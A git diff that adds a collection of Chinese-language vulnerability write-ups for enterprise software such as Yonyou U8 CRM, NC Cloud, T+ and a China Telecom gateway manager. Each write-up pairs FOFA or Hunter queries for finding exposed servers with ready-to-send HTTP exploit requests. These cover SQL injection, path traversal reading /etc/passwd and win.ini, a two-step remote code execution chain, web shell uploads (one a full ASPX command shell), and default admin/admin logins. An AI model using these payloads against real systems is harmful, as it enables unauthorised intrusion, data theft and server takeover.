+Error:?? nvarchar ? 'e10adc3949ba59abbe56e057f20f883e' ??????? int ????
+```
diff --git a/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md b/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..b3806e0
--- /dev/null
+++ b/用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞.md
@@ -0,0 +1,28 @@
+# 用友U8CRM系统接口relobjreportlist.php存在SQL注入漏洞
+
+用友U8 CRM 客户关系管理系统 config/relobjreportlist.php 文件存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## fofa
+
+```javascript
+title="用友U8CRM"
+```
+
+## hunter
+
+```javascript
+app.name="用友 CRM"
+```
+
+## poc
+
+```javascript
+POST /config/relobjreportlist.php HTTP/1.1
+Host: 
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=bgsesstimeout-;
+
+DontCheckLogin=1&Action=CheckRelUser&typeID=1&objType=1&ids=1');WAITFOR DELAY '0:0:5'--
+```
+
+![image-20240918135123639](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409181351732.png)
\ No newline at end of file
diff --git a/用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md b/用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md
new file mode 100644
index 0000000..f7568f3
--- /dev/null
+++ b/用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞.md
@@ -0,0 +1,30 @@
+# 用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞
+
+用友U8CRM系统接口setremindtoold.php存在SQL注入漏洞，未经身份验证的攻击者通过漏洞执行任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。
+
+## fofa
+
+```javascript
+title="用友U8CRM"
+```
+
+## hunter
+
+```javascript
+app.name="用友 CRM"
+```
+
+## poc
+
+```javascript
+GET /ajax/setremindtoold.php?dID=1;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Cookie: PHPSESSID=bgsesstimeout-;
+Connection: close
+```
+
+![image-20240926094445980](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409260944059.png)
\ No newline at end of file
diff --git a/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md b/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md
new file mode 100644
index 0000000..2d0c829
--- /dev/null
+++ b/用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞.md
@@ -0,0 +1,22 @@
+# 用友U8Cloud系统接口MeasureQResultAction存在SQL注入漏洞
+
+用友U8 Cloud nc.ui.iufo.query.measurequery.MeasureQResultAction 接口处存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```yaml
+title=="U8C"
+```
+
+## poc
+
+```java
+GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQResultAction&method=execute&selectQueryCondition=1%27);WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Connection: close
+```
+
+![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202408241854934.png)
\ No newline at end of file
diff --git a/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md b/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md
new file mode 100644
index 0000000..f6eaf82
--- /dev/null
+++ b/用友YonBIP高级版yonbiplogin存在任意文件读取漏洞.md
@@ -0,0 +1,22 @@
+# 用友YonBIP高级版yonbiplogin存在任意文件读取漏洞
+YonBIP用友商业创新平台，是用友在数字经济时代面向成长型、大型企业及巨型企业，融合了先进且高可用技术平台和公共与关键商业应用与服务，支撑和运行客户的商业创新（业务创新、管理变革），并且具有数字化、智能化、高弹性、安全可信、社会化、全球化、平台化、生态化等特征的综合型服务平台。用友YonBIP高级版yonbiplogin存在任意文件读取漏洞
+
+## fofa
+```javascript
+title="YonBIP" || title="数字化工作台"
+```
+
+![](https://cdn.nlark.com/yuque/0/2023/png/1622799/1699617335151-ab45cdc1-ba2a-4518-8a9d-5aa6a95e7263.png)
+
+## poc
+```plain
+GET /iuap-apcom-workbench/ucf-wh/yonbiplogin/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%2500.png.js HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
+Connection: close
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Encoding: gzip, deflate, br
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1731492309168-0423a749-4e24-497f-81f0-6ca9908af8d6.png)
+
diff --git a/用友crm客户关系管理help.php存在任意文件读取漏洞.md b/用友crm客户关系管理help.php存在任意文件读取漏洞.md
new file mode 100644
index 0000000..91834a4
--- /dev/null
+++ b/用友crm客户关系管理help.php存在任意文件读取漏洞.md
@@ -0,0 +1,19 @@
+# 用友crm客户关系管理help.php存在任意文件读取漏洞
+
+
+
+## fofa
+
+```yaml
+body="用友 U8CRM"
+```
+
+## poc
+
+```java
+GET /pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
+
+```
+
diff --git a/用友nc-cloud-RCE.md b/用友nc-cloud-RCE.md
new file mode 100644
index 0000000..0c1cfb9
--- /dev/null
+++ b/用友nc-cloud-RCE.md
@@ -0,0 +1,47 @@
+## 用友nc-cloud RCE
+```
+漏洞影响
+NC63、NC633、NC65
+NC Cloud1903、NC Cloud1909
+NC Cloud2005、NC Cloud2105、NC Cloud2111
+YonBIP高级版2207
+
+先发送数据包，返回200
+
+POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+Host: 127.0.0.1:8080
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: cookiets=168170496; JSESSIONID=33A343770FF.server
+If-None-Match: W/"1571-1589211696000"
+If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 249
+
+{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}
+
+再发送数据包执行命令，返回命令执行结果
+
+POST /404.jsp?error=bsh.Interpreter HTTP/1.1
+Host: 127.0.0.1:8080
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Cookie: cookiets=1681785232226; JSESSIONID=334D3ED07A343770FF.server
+If-None-Match: W/"1571-1589211696000"
+If-Modified-Since: Mon, 11 May 2020 15:41:36 GMT
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 104
+
+cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("ping 8.8.8.8").getInputStream())
+
+```
diff --git a/用友u9系统接口TransWebService存在未授权访问漏洞.md b/用友u9系统接口TransWebService存在未授权访问漏洞.md
new file mode 100644
index 0000000..a0548af
--- /dev/null
+++ b/用友u9系统接口TransWebService存在未授权访问漏洞.md
@@ -0,0 +1,16 @@
+# 用友u9系统接口TransWebService存在未授权访问漏洞
+用友U9秉承互联网基因，是全球第一款基于SOA云架构的多组织企业互联网应用平台。U9以精细化管理、产业链协协同与社交化商业，帮助多组织企业（多事业部/多地点/多工厂/多法人）在互联网时代实现商业模式创新、组织变革与管理升级。用友u9 TransWebService存在未授权访问漏洞
+
+## Hunter
+
+```javascript
+web.body="logo-u9.png"
+```
+
+## poc
+```plain
+/U9Supplier/CS/Office/TransWebService.asmx
+```
+
+![](https://cdn.nlark.com/yuque/0/2024/png/29512878/1729854825599-c70fe318-3b26-4416-82ef-6d38998e1e0f.png)
+
diff --git a/用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md b/用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md
new file mode 100644
index 0000000..e9a1c38
--- /dev/null
+++ b/用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞.md
@@ -0,0 +1,32 @@
+# 用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞
+
+用友畅捷通-TPlus系统接口FileUploadHandler.ashx存在任意文件上传漏洞，允许攻击者上传恶意文件到服务器，可能导致远程代码执行、网站篡改或其他形式的攻击，严重威胁系统和数据安全。
+
+## fofa
+
+```javascript
+app="畅捷通-TPlus"
+```
+
+## poc
+
+```pseudocode
+POST /tplus/SM/SetupAccount/FileUploadHandler.ashx/;/login HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept: */*
+Connection: close
+Content-Length: 180
+Content-Type: multipart/form-data; boundary=f95ec6be8c3acff8e3edd3d910d3b9a6
+
+--f95ec6be8c3acff8e3edd3d910d3b9a6
+Content-Disposition: form-data; name="file"; filename="test123.txt"
+Content-Type: image/jpeg
+
+test123
+--f95ec6be8c3acff8e3edd3d910d3b9a6--
+```
+
+文件路径`/tplus/UserFiles/test123.txt`
+
diff --git a/申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md b/申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md
new file mode 100644
index 0000000..3a55fff
--- /dev/null
+++ b/申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞.md
@@ -0,0 +1,30 @@
+# 申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞
+
+# 一、漏洞简介
+申瓯通信设备有限公司在线录音管理系统系统是一款全面的企业管理软件，涵盖多个领域，助力企业实现信息化管理和业务优化。申瓯通信设备有限公司在线录音管理系统index存在文件包含漏洞。
+
+# 二、影响版本
++ 在线录音管理系统
+
+# 三、资产测绘
++ fofa`title="在线录音管理系统"<font style="color:rgb(221, 17, 68);"></font>`
+
+![1718298593944-67a12797-71e8-44ee-8755-020482502e3d.png](./img/S_cYMDLU99OSGVbJ/1718298593944-67a12797-71e8-44ee-8755-020482502e3d-126112.png)
+
+# 四、漏洞复现
+```java
+GET /callcenter/public/index.php?s=index/\think\Lang/load&file=/etc/passwd HTTP/1.1
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
+Cache-Control: no-cache
+Pragma: no-cache
+Host: 
+Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+Connection: close
+```
+
+![1718714151400-95020a2d-915f-4d12-b219-daf747b492c3.png](./img/S_cYMDLU99OSGVbJ/1718714151400-95020a2d-915f-4d12-b219-daf747b492c3-939244.png)
+
+
+
+> 更新: 2024-06-23 23:42:49  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/zdcq09yhyllgqpdn>
\ No newline at end of file
diff --git a/申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md b/申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md
new file mode 100644
index 0000000..a954df2
--- /dev/null
+++ b/申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞.md
@@ -0,0 +1,30 @@
+# 申瓯通信设备有限公司在线录音管理系统存在任意文件下载漏洞
+
+# 一、漏洞简介
+申瓯通信设备有限公司在线录音管理系统系统是一款全面的企业管理软件，涵盖多个领域，助力企业实现信息化管理和业务优化。此系统某接口存在任意文件下载漏洞。
+
+# 二、影响版本
++ 在线录音管理系统
+
+# 三、资产测绘
++ fofa`title="在线录音管理系统"<font style="color:rgb(221, 17, 68);"></font>`
+
+![1718298593944-67a12797-71e8-44ee-8755-020482502e3d.png](./img/nlilfazuEw8aisMY/1718298593944-67a12797-71e8-44ee-8755-020482502e3d-717945.png)
+
+# 四、漏洞复现
+```java
+GET /main/download?path=/etc/passwd HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+```
+
+![1718298567408-25df445c-3f5d-4b24-88db-ea01d7b8761a.png](./img/nlilfazuEw8aisMY/1718298567408-25df445c-3f5d-4b24-88db-ea01d7b8761a-936078.png)
+
+
+
+> 更新: 2024-06-17 09:34:03  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vfuzmf2gkqngd4iv>
\ No newline at end of file
diff --git a/电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md b/电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md
new file mode 100644
index 0000000..fe60934
--- /dev/null
+++ b/电信网关配置管理后台upload_channels.php接口存在文件上传漏洞.md
@@ -0,0 +1,31 @@
+## 电信网关配置管理后台upload_channels.php接口存在文件上传漏洞
+
+电信网关配置管理系统/bak_manager/upload_channels.php 接口存在文件上传漏洞,未经身份验证的远程攻击者可以利用文件上传漏洞获取系统权限。
+
+## fofa
+
+```javascript
+body="a:link{text-decoration:none;color:orange;}"
+```
+
+## poc
+
+```jinja2
+POST /bak_manager/upload_channels.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="file"; filename="rce.php"
+Content-Type: text/plain
+
+<?php system("uname -a");unlink(__FILE__);?>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![image-20241108205412226](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411082054279.png)
+
+文件路径：`/bak_manager/rce.php`
\ No newline at end of file
diff --git a/电信网关配置管理系统rewrite存在文件上传漏洞.md b/电信网关配置管理系统rewrite存在文件上传漏洞.md
new file mode 100644
index 0000000..a69c5c9
--- /dev/null
+++ b/电信网关配置管理系统rewrite存在文件上传漏洞.md
@@ -0,0 +1,51 @@
+# 电信网关配置管理系统rewrite存在文件上传漏洞
+
+# 一、漏洞简介
+<font style="color:rgba(0, 0, 0, 0.9);">中国电信集团有限公司（英文名称“China Telecom”、简称“中国电信”）成立于2000年9月，是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统del_file存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。</font>
+
+# <font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>
++ 电信网关配置管理系统
+
+# 三、资产测绘
++ fofa`body="img/dl.gif" && title="系统登录"`
++ 特征
+
+![1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1.png](./img/8c5EN0nJePhVygzM/1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1-275973.png)
+
+# 四、漏洞复现
+```java
+POST /manager/teletext/material/rewrite.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
+Connection: close
+ 
+------WebKitFormBoundaryOKldnDPT
+Content-Disposition: form-data; name="tmp_name"; filename="test.php"
+Content-Type: image/png
+ 
+<?php echo md5('666');unlink(__FILE__);?>
+------WebKitFormBoundaryOKldnDPT
+Content-Disposition: form-data; name="uploadtime"
+ 
+ 
+------WebKitFormBoundaryOKldnDPT--
+```
+
+![1715354904567-3e7260cf-b3ae-4345-bbb9-4ebc6db96872.png](./img/8c5EN0nJePhVygzM/1715354904567-3e7260cf-b3ae-4345-bbb9-4ebc6db96872-007827.png)
+
+上传文件地址
+
+```java
+GET /xmedia/material/test1.php HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
+Connection: close
+```
+
+![1715354913211-9d648019-ec1d-43a8-9f31-328adcc87fcb.png](./img/8c5EN0nJePhVygzM/1715354913211-9d648019-ec1d-43a8-9f31-328adcc87fcb-610528.png)
+
+
+
+> 更新: 2024-05-14 11:21:12  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ukcgt02yr1b4yu4l>
\ No newline at end of file
diff --git a/电信网关配置管理系统存在弱口令漏洞.md b/电信网关配置管理系统存在弱口令漏洞.md
new file mode 100644
index 0000000..e6460f9
--- /dev/null
+++ b/电信网关配置管理系统存在弱口令漏洞.md
@@ -0,0 +1,37 @@
+# 电信网关配置管理系统存在弱口令漏洞
+
+**<font style="color:rgb(38, 38, 38);">一、漏洞简介</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgba(0, 0, 0, 0.9);">中国电信集团有限公司（英文名称“China Telecom”、简称“中国电信”）成立于2000年9月，是中国特大型国有通信企业、上海世博会全球合作伙伴。电信网关配置管理系统del_file存在远程命令执行漏洞，攻击者可通过该漏洞获取服务器权限。</font><font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgba(0, 0, 0, 0.9);">二、影响版本</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">●电信网关配置管理系统  
+</font>**<font style="color:rgb(38, 38, 38);">三、资产测绘</font>**<font style="color:rgb(38, 38, 38);">  
+</font><font style="color:rgb(38, 38, 38);">●fofabody="src=\"img/dl.gif\"" && title="系统登录"  
+●特征</font>
+
+![1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1.png](./img/_B2JSQE8NXjKlV47/1713231679173-db9b0c3c-79d6-4f91-baac-a8358f5ccad1-665634.webp)
+
+<font style="color:rgb(38, 38, 38);">  
+</font>**<font style="color:rgb(38, 38, 38);">四、漏洞复现</font>**
+
+```yaml
+POST /manager/login.php HTTP/1.1
+Host: 
+Upgrade-Insecure-Requests: 1
+Content-Type: application/x-www-form-urlencoded
+Cookie: PHPSESSID=tskslsm160gbfc5o8uskotr8i3
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Cache-Control: max-age=0
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Content-Length: 21
+
+Name=admin&Pass=admin
+```
+
+![1715327827741-bc58eb3d-2fa2-4e56-b04f-9bdd8dd8b59a.png](./img/_B2JSQE8NXjKlV47/1715327827741-bc58eb3d-2fa2-4e56-b04f-9bdd8dd8b59a-686922.png)
+
+
+
+> 更新: 2024-05-14 11:22:11  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tskidd2bz9yqeir3>
\ No newline at end of file
diff --git a/电子图书阅读平台downFile.aspx存在SQL注入漏洞.md b/电子图书阅读平台downFile.aspx存在SQL注入漏洞.md
new file mode 100644
index 0000000..5f945f5
--- /dev/null
+++ b/电子图书阅读平台downFile.aspx存在SQL注入漏洞.md
@@ -0,0 +1,23 @@
+# 电子图书阅读平台downFile.aspx存在SQL注入漏洞
+
+电子图书阅读平台 downFile.aspx 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
+
+## fofa
+
+```javascript
+body="/Index.aspx/SearchBy"
+```
+
+## poc
+
+```javascript
+GET /web/downFile.aspx?id=%27%2B%28SELECT+CHAR%2867%29%2BCHAR%2885%29%2BCHAR%2886%29%2BCHAR%2879%29+WHERE+1651%3D1651+AND+7828+IN+%28SELECT+%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28122%29%2BCHAR%28113%29%2B%28SELECT+%28CASE+WHEN+%287828%3D7828%29+THEN+CHAR%2849%29+ELSE+CHAR%2848%29+END%29%29%2BCHAR%28113%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%28113%29%29%29%29%2B%27 HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
+Accept: */*
+Accept-Encoding: gzip, deflate
+Accept-Language: zh-CN,zh;q=0.9
+Connection: close
+```
+
+![image-20241211211738168](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412112117238.png)
\ No newline at end of file
diff --git a/电子文档安全管理系统V6.0存在任意文件下载.md b/电子文档安全管理系统V6.0存在任意文件下载.md
new file mode 100644
index 0000000..6c45d87
--- /dev/null
+++ b/电子文档安全管理系统V6.0存在任意文件下载.md
@@ -0,0 +1,37 @@
+# 电子文档安全管理系统 V6.0存在任意文件下载
+
+# 一、漏洞简介
+济南上邦电子科技有限公司电子文档安全管理系统 V6.0存在任意文件下载
+
+# 二、影响版本
++ 济南上邦电子科技有限公司电子文档安全管理系统 V6.0
+
+# 三、资产测绘
++ hunter`web.body="docsafe/docsafe.nocache.js"`
++ 特征
+
+![1699199045776-f8cbf631-7614-41f1-9f78-33e297fad57f.png](./img/TTDVgI4zPNgSGRd0/1699199045776-f8cbf631-7614-41f1-9f78-33e297fad57f-841313.png)
+
+# 四、漏洞复现
+```plain
+GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
+Host: xx.xx.xx.xx
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Upgrade-Insecure-Requests: 1
+Sec-Fetch-Dest: document
+Sec-Fetch-Mode: navigate
+Sec-Fetch-Site: none
+Sec-Fetch-User: ?1
+Te: trailers
+Connection: close
+```
+
+![1699199071902-432a9c06-5ba9-4b9e-9ded-b947c4bd6ddd.png](./img/TTDVgI4zPNgSGRd0/1699199071902-432a9c06-5ba9-4b9e-9ded-b947c4bd6ddd-986909.png)
+
+
+
+> 更新: 2024-02-29 23:55:47  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/up1n14t1s2wcmfqp>
\ No newline at end of file
diff --git a/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md b/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md
new file mode 100644
index 0000000..9b2a92f
--- /dev/null
+++ b/电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞.md
@@ -0,0 +1,21 @@
+# 电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞
+
+济南上邦电子科技有限公司电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞，攻击者可通过该漏洞获取服务器所有文件信息
+
+## fofa
+
+```javascript
+body="docsafe/docsafe.nocache.js"
+```
+
+## poc
+
+```javascript
+GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
+Host: 
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+Accept-Encoding: gzip, deflate, br, zstd
+Accept-Language: zh-CN,zh;q=0.9
+Connection: keep-alive
+```
+
diff --git a/电子文档安全管理系统backup存在任意文件读取漏洞.md b/电子文档安全管理系统backup存在任意文件读取漏洞.md
new file mode 100644
index 0000000..c76c233
--- /dev/null
+++ b/电子文档安全管理系统backup存在任意文件读取漏洞.md
@@ -0,0 +1,26 @@
+# 电子文档安全管理系统backup存在任意文件读取漏洞
+
+# 一、漏洞简介
+电子文档安全管理系统backup存在任意文件读取漏洞，攻击者可通过该漏洞获取敏感信息。
+
+# 二、影响版本
++ 电子文档安全管理系统
+
+# 三、资产测绘
++ fofa`body="docsafe/docsafe.nocache.js"`
++ 特征
+
+![1711559478518-0232de33-0834-4e8b-810e-5f00b48ab8c1.png](./img/ohRPmprCIfKOOSbD/1711559478518-0232de33-0834-4e8b-810e-5f00b48ab8c1-521404.png)
+
+# 四、漏洞复现
+```plain
+GET /resources/backup/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
+Host: 
+```
+
+![1711559503009-cba29cc4-6a6b-4818-bc51-cd05c8112b1e.png](./img/ohRPmprCIfKOOSbD/1711559503009-cba29cc4-6a6b-4818-bc51-cd05c8112b1e-540735.png)
+
+
+
+> 更新: 2024-04-20 22:27:26  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ef5aearlcpog05ob>
\ No newline at end of file
diff --git a/电子资料管理系统ImageUpload.ashx文件上传漏洞.md b/电子资料管理系统ImageUpload.ashx文件上传漏洞.md
new file mode 100644
index 0000000..7814869
--- /dev/null
+++ b/电子资料管理系统ImageUpload.ashx文件上传漏洞.md
@@ -0,0 +1,43 @@
+# 电子资料管理系统ImageUpload.ashx文件上传漏洞
+
+电子资料管理系统 /Menu/ImageManger/ImageUpload.ashx 接口存在文件上传漏洞，未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码，写入后门，获取服务器权限，进而控制整个 web 服务器。
+
+## fofa
+
+```javascript
+body="Menu/Login/ThirdLoginHandler.ashx"
+```
+
+## poc
+
+```javascript
+POST /Menu/ImageManger/ImageUpload.ashx HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryssh7UfnPpGU7BXfK
+Upgrade-Insecure-Requests: 1
+Accept-Encoding: gzip
+
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="isUpload"
+
+印章图片
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="entid"
+
+666
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="Type"
+
+1
+------WebKitFormBoundaryssh7UfnPpGU7BXfK
+Content-Disposition: form-data; name="Filedata"; filename="../rce.aspx"
+Content-Type: text/plain
+
+<%@ Page Language="Jscript" validateRequest="false" %><%var c=new System.Diagnostics.ProcessStartInfo("cmd");var e=new System.Diagnostics.Process();var out:System.IO.StreamReader,EI:System.IO.StreamReader;c.UseShellExecute=false;c.RedirectStandardOutput=true;c.RedirectStandardError=true;e.StartInfo=c;c.Arguments="/c " + Request.Item["cmd"];e.Start();out=e.StandardOutput;EI=e.StandardError;e.Close();Response.Write(out.ReadToEnd() + EI.ReadToEnd());System.IO.File.Delete(Request.PhysicalPath);Response.End();%>
+------WebKitFormBoundaryssh7UfnPpGU7BXfK--
+```
+
+![image-20241128165016950](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411281650029.png)
+
+文件路径：`http://127.0.0.1/rce.aspx`
\ No newline at end of file
